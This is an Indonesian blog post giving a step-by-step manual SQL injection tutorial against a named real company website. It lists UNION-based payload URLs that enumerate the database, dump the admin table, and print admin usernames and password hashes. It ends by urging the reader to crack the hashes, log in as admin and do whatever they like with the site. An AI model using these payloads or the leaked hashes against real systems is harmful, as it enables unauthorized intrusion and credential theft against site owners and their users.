Selasa, 22 November 2011

SQL Injection manual langkah demi langkah

Oke langsung aja ya,,, :)
- cari web target  : contoh : http://www.jspec.com.sg/jspec_info.php?read=5 yang vulnerabel tentunya
  apa itu vulnerabel ?? tanya aja di paman google,,
- kalo udah dapet kasi tanda (') di belakang nya,,, contohnya:
  http://www.jspec.com.sg/jspec_info.php?read=5'
- nah maka akan muncul :
Mysql query : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ; near
- kemudian ketikkan code ini : order+by contohnya:
  http://www.jspec.com.sg/jspec_info.php?read=5+order+by+1--  kalo muncul normal berarti next
  http://www.jspec.com.sg/jspec_info.php?read=5+order+by+2-- jika masih normal berarti lanjutkan lagi,,,
  semisal yang error itu order+by+4-- seperti : http://www.jspec.com.sg/jspec_info.php?read=5+order+by+4-- berarti yang kita inject adalah 4-1=3 alias 1,2,3
- nah kalo udah nemu errornya langsung aja tuliskan code berikut :
 http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,2,3--
  (jangan lupa kasi tansa (-) sebelum angka bug nya,,, gunanya union+select+1,2,3-- itu untuk
  mengetahui angka ajaib untuk siap di inject,, seperti 3 dan 2
- langsung aja kita liat versi sql dengan mengetikkan version() atau @@version
  dari web contohnya :
  http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,version(),3-- atau
  http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,@@version,3--
 maka akan muncul : 5.0.92-community
- lalu ketikkan codenya untuk melihat table database nya seperti berikut :
 http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--
- nah muncul kan table databasenya,,,,???? nah kalo muncul seperti ini :
 admin,enquiry_cart,enquiry_cart_item,home_highlight,invoice,member,other,product,product_cate,product_highlight,promotion,service,texttool_image
kita cari table yang menjurus ke admin yaitu table admin
  lalu kita convert dulu ke hexa di converter,,, untuk convert nya disini  hasil convert dari table admin adalah : 61646d696e
- kemudian tugas kita adalah mencari column dari database web itu,,, ketikkan code berikut :
  http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x61646d696e--
- nah muncul deh column nya seperti contohnya : admin_id,admin_pwd1,admin_pwd2,admin_name
- langsung kita eksekusi apa nama admin dan passwordnya dengan code berikut :
  http://www.jspec.com.sg/jspec_info.php?read=-5+union+select+1,group_concat(admin_pwd1,0x3a,admin_pwd2,0x3a,admin_id,0x3a,admin_name),3+from+admin--
  fungsi 0x3a itu adalah untuk pembagi hexa,,
- nah muncul deh username dan password adminnya,,,
admin nya ada dua,,,
user : admin , id : 2 ,  password1: f8f5581b50e5df93e8782756bc0227db , password2 : f8f5581b50e5df93e8782756bc0227db
user : fullaccess , id : 1 , password1 : 4bcce484ad368465dba37a481e1428d9 , password2 : e4a4a96a69a1b2b530b3bec6734cdf52
karena password nya masih berbentuk hash maka perlu di descrypt agar mengetahui password yang aslinya. setelah dapat,,,
- lalu tinggal cari page login adminnya,,, kemudian kamu bisa login sebagai admin,,, terserah mau di apain itu web,,, :D

Tidak ada komentar:

Posting Komentar